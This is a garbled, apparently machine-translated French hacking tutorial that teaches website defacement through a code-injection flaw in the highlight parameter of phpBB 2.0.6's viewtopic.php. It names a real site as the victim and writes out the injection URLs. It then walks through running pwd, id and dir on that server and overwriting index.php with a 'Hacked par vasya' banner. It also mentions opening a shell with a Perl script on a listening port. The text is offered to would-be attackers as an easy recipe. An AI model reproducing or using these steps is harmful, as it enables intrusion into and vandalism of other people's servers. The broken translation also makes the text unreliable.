Le guide complet de mutiler (mise à jour)

introduction
Je vois souvent une question sur le forum, "Comment briser sites?" ou "Comment zadefeysit site?". Aujourd'hui, vous pouvez defeysnut portail, de ne pas avoir mis une goutte de l'effort! Tous les amateurs de proie facile invitent! =)

principal
Aujourd'hui, je vais parler de la façon de faire defeysy différents sites grâce à des erreurs dans les scripts populaires. Il a été récemment découvert un trou de sécurité sérieux dans le moteur phpBB populaire.
Une vulnérabilité a été découverte dans le module viewtopic.php

Le fait qu'un attaquant distant pourrait exécuter arbitraire php-script sur un système vulnérable avec la ligne de transmission est sur le viewtopic.php? T = 1 & highlight =% 27

Comme vous l'avez probablement deviné, cette vulnérabilité permet d'exécuter des commandes arbitraires sur un serveur vulnérable toute la longueur. Aujourd'hui, nous profitons de ce trou, et en même temps que vous briserons le vrai serveur existant. Notre objectif sera juste mutiler, à savoir le remplacement de la page d'accueil sur notre propre.

Donc, nous procédons, notre sacrifice www.maxmuscle.dk (au moment de la publication du portail de l' article est résistant à la vulnérabilité).
La première chose qui attire notre attention, lorsque vous visitez cette page, il est donc ce qu'il est basé sur un système de portail php-nuke.

Par défaut, le système est précisément le forum phpBB. Nous cliquons sur un lien qui nous mène au forum, (http://www.maxmuscle.dk/osclux/modules.php?op=modload&name=phpbb2&filе=index.php) et assurez-vous que ce soit la version de phpBB 2.0.6 .

Nous passons la demande sur le forum de ce genre:

s = http://www.maxmuscle.dk/osclux/modules.php?op=modload&name=phpbb2&filе=viewtopic.php&t=2&highlight=%27.$poster=`$ls`.%27&l

et nous constatons que le moteur est consommé comme en témoigne la ligne du signe caractéristique au lieu d'un surnom de l'un des membres: ") #i". Mais il ne veut rien dire, nous pouvons facilement rompre l'exécution de commandes sur le serveur, mais nous ne serons pas spéculer, et juste essayer de l'exécuter:

http://www.maxmuscle.dk/osclux/modules.php?op=modload&name=phpbb2&filе=viewtopic.php&t=2&highlight=%27.$poster=`$ls`.%27&l s = pwd

Cette commande (pwd) devrait nous montrer le répertoire où nous sommes maintenant, si cela se produit, il découle de cette conclusion que l'exécution de commandes sur le serveur possible. Et ce qui se passe. Chemin répertoire / var / www / html / osclux / affiché. La commande suivante devrait être «id» pour vérifier notre accès.

Comme nous pouvons le voir , nous avons le droit uid = 99 (personne), à savoir le serveur web droit. Maintenant , nous obtenons la liste des dossiers et des fichiers dans la commande répertoire html_public "dir / var / www / html / osclux" et constatons que si nécessaire pour nous defeysa index.php est dans ce répertoire.

Nous sommes donc à la ligne d'arrivée - la commande echo Hacked par vasya> index.php, nous vyvdem votre page d' accueil inscription «Hacked par vasya». Vérifiez. Il est apparu.

Vous avez défigurer.

Au lieu d'une conclusion
Il est si simple moyen a eu lieu defeys hackzona.ru, de cette façon a été brisée Forum nsd.ru. Notez également que cela est la mise en œuvre la plus simple de ce trou, dans de bonnes conditions peuvent être facilement baie sur le serveur port d'écoute spécifique, le script en Perl et ont déjà une coque complète avec les privilèges personne.